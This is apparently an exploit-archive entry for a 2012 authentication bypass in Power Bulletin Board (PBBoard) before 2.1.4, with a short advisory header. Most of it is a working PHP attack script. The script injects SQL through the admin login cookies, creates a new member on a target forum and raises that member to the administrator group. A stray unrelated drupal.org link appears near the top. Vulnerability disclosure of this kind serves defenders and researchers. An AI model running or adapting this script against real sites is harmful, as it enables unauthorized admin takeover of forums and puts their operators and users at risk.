source: https://www.securityfocus.com/bid/54862/info
PBBoard is a web-based messaging board application implemented in PHP.
Attackers may exploit these issues to gain unauthorized access to user accounts or to bypass intended security restrictions. Other attacks may also be possible.
PBBoard versions prior to 2.1.4 are vulnerable.
http://drupal.org/node/207891
<?
/*
 + Application : Power Bulletin Board < 2.1.4
 | Download    : pbboard.com
 | By Faris , AKA i-Hmx
 | n0p1337@gmail.com
 + sec4ever.com , 1337s.cc

 Time line :
 > 14/7/2012 , Vulnerability discovered
 > 30/7/2012 , Vendor Reported
 > 31/7/2012 , patch released
 > 01/8/2012 , Public disclosure

 Root cause, as reported:

 engine/engine.class.php
     $this->_CONF['admin_username_cookie'] = 'PowerBB_admin_username';
     $this->_CONF['admin_password_cookie'] = 'PowerBB_admin_password';

 admin/common.module.php
     if (!empty($username)
         and !empty($password))
     {
         $CheckArr = array();
         $CheckArr['username'] = $username;
         $CheckArr['password'] = $password;

         $CheckMember = $PowerBB->member->CheckAdmin($CheckArr);

         if ($CheckMember != false)
         {
             $PowerBB->_CONF['rows']['member_row'] = $CheckMember;
             $PowerBB->_CONF['member_permission'] = true;
         }
         else
         {
             $PowerBB->_CONF['member_permission'] = false;
         }
     }

 CheckAdmin() is defined in engine/systyms/member.class.php; follow the
 call chain from there until you reach the vulnerable query.

 The login check can be bypassed because the cookie values are not
 sanitized before they are used in the login confirmation query.
 Versions prior to 2.1.4 are affected.
*/

// Banner, then the prompt that the main script answers from STDIN.
// Joined with "\n": the empty first element yields the leading blank line,
// the empty element before the prompt yields the blank line after the box.
echo implode("\n", array(
    '',
    '+-------------------------------------------+',
    '| PBulletin Board < 2.1.4 |',
    '| Auth Bypass vuln / Admin add Exploit |',
    '| By i-Hmx |',
    '| n0p1337@gmail.com |',
    '+-------------------------------------------+',
    '',
    '| Enter Target # ',
));
/**
 * Send one HTTP request with cURL and return the raw response.
 *
 * The response includes its headers (CURLOPT_HEADER is enabled) and
 * redirects are not followed, so callers parse the first reply as-is.
 *
 * @param string $url     host and path without a scheme; "http://" is prepended
 * @param string $post    request body handed to CURLOPT_POSTFIELDS
 * @param string $cookies raw value for the Cookie request header
 * @return string|false   response text, or false when curl_exec() fails
 */
function get($url, $post, $cookies){
    // Same options, same order, as the one-by-one curl_setopt() calls.
    $options = array(
        CURLOPT_RETURNTRANSFER => 1,
        CURLOPT_URL            => 'http://' . $url,
        CURLOPT_POSTFIELDS     => $post,
        CURLOPT_COOKIE         => $cookies,
        CURLOPT_FOLLOWLOCATION => 0,
        CURLOPT_TIMEOUT        => 20,
        CURLOPT_HEADER         => true,
    );

    $handle = curl_init();
    curl_setopt_array($handle, $options);
    $response = curl_exec($handle);
    curl_close($handle);

    return $response;
}
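/**
 * Return the text between the first occurrence of $start and the next
 * occurrence of $end after it.
 *
 * @param string $string haystack to search
 * @param string $start  opening marker (excluded from the result)
 * @param string $end    closing marker (excluded from the result)
 * @return string the enclosed text, or "" when either marker is absent
 */
function kastr($string, $start, $end){
    // A space is prepended so a genuine match can never sit at offset 0;
    // the original relied on that to tell "found at 0" from "not found".
    $haystack = " " . $string;

    $from = strpos($haystack, $start);
    // strpos() returns false when the marker is missing. Compare strictly
    // rather than via `== 0`, which conflated false with an offset of 0.
    if ($from === false || $from === 0) return "";
    $from += strlen($start);

    $to = strpos($haystack, $end, $from);
    // Previously a missing end marker produced `false - $from`, i.e. a
    // negative length passed to substr(), returning an arbitrary slice.
    if ($to === false) return "";

    return substr($haystack, $from, $to - $from);
}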
// Target host (and optional path) read from STDIN in answer to the banner
// prompt; a leading "http://" is stripped because get() prepends it.
$vic=str_replace('http://','',trim(fgets(STDIN)));
if($vic==''){exit();}
// NOTE(review): $log is opened here but never written to or closed in the
// visible code.
$log=fopen('faris.txt','w+');
// Numeric suffix for the account created below — presumably to avoid
// colliding with an account left by an earlier run.
$ran=rand(10000,20000);
echo "| Adding New User\n";
// Request 1: the admin "add member" page. Authentication rests solely on the
// PowerBB_admin_* / PowerBB_* cookie values, which the header comment
// describes as reaching the login confirmation query unsanitized.
$add=get($vic.'/admin.php?page=member&add=1&start=1',"username=f4ris_$ran&password=sec4ever1337s&email=n0p1337_$ran@gmail.com&gender=m&submit=%D9%85%D9%88%D8%A7%D9%81%D9%82","PowerBB_admin_username=faris' or id='1; PowerBB_admin_password=faris' or password like '%;PowerBB_username=faris' or id='1;PowerBB_password=faris' or password like '%");
// The new member id is scraped from a "main=1&id=N" link in the response;
// an empty result means the expected page was not returned.
$myid=kastr($add,'main=1&id=','">');
if($myid==''){exit("| Exploitation Failed\n - Magic_Quotes Maybe on or wrong path\n+ Exit");}
echo "| User Data :\n + UserName : f4ris_$ran\n + Password : sec4ever1337s\n + User ID : $myid\n";
echo "| Updating User privileges\n";
// Request 2: the admin "edit member" page for the id scraped above, sent
// with the same cookies. Its response ($update) is never inspected, so
// success of this step is not verified by the script.
$update=get($vic."admin.php?page=member&edit=1&start=1&id=$myid","username=f4ris_$ran&new_username=f4ris_$ran&new_password=sec4ever1337s&email=n0p1337_$ran@gmail.com&usergroup=1&gender=m&style=1&lang=1&avater_path=&user_info=&user_title=F4r54wy&posts=0&website=sec4ever.com&month=0&day=0&year=&user_country=&ip=&warnings=0&reputation=10&hide_online=0&user_time=&send_allow=1&pm_emailed=0&pm_window=1&visitormessage=1&user_sig=&review_subject=0&review_reply=0&submit=%D9%85%D9%88%D8%A7%D9%81%D9%82","PowerBB_admin_username=faris' or id='1; PowerBB_admin_password=faris' or password like '%;PowerBB_username=faris' or id='1;PowerBB_password=faris' or password like '%");
echo "+ Exploitatin Done ;)\n";
exit();
?>